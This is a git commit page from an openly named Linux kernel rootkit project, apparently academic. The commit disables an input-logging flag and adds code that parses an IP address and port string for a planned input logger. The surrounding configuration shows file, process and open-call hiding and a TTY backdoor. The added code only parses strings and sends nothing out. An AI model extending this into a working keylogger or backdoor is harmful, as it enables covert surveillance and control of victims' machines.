adds initial socket string parsing - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 9c86f5862f27ce716fa454cb54e1347fdacb0248
parent 690697be6d8195bff6893781c68c73b43b62fd42
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 12 Dec 2020 02:21:22 +0100

adds initial socket string parsing

Diffstat:
M src/g7.c  | 2 +-
M src/inputlog.c  | 18 ++++++++++++++++++

2 files changed, 19 insertions(+), 1 deletion(-)
diff --git a/src/g7.c b/src/g7.c
@@ -44,7 +44,7 @@ rootkit_t rootkit = {
     .hiding_files  = true,
     .hiding_open   = true,
     .hiding_pids   = true,
-    .logging_input = true,
+    .logging_input = false,
     .backdoor = BD_TTY,
 };
 
diff --git a/src/inputlog.c b/src/inputlog.c
@@ -1,9 +1,27 @@
+#include <linux/kernel.h>
+#include <linux/inet.h>
+
+#include "common.h"
 #include "inputlog.h"
 
+struct socket sock;
+
 void
 log_input(const char *ip, const char *port)
 {
+    size_t i;
+    u8 ip_quad[4];
+    unsigned long ip_ul;
+    unsigned long port_ul;
+
+    kstrtoul(port, 10, &port_ul);
+    in4_pton(ip, -1, ip_quad, -1, NULL);
+
+    ip_ul = 0;
+    for (i = 0; i < 4; ++i)
+        ip_ul += (ip_quad[i] & 0xFF) << (8 * i);
 
+    DEBUG_INFO("ip_s = %s, port_s = %s, ip: %lu, port: %lu\n", ip, port, ip_ul, port_ul);
 }
 
 void

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs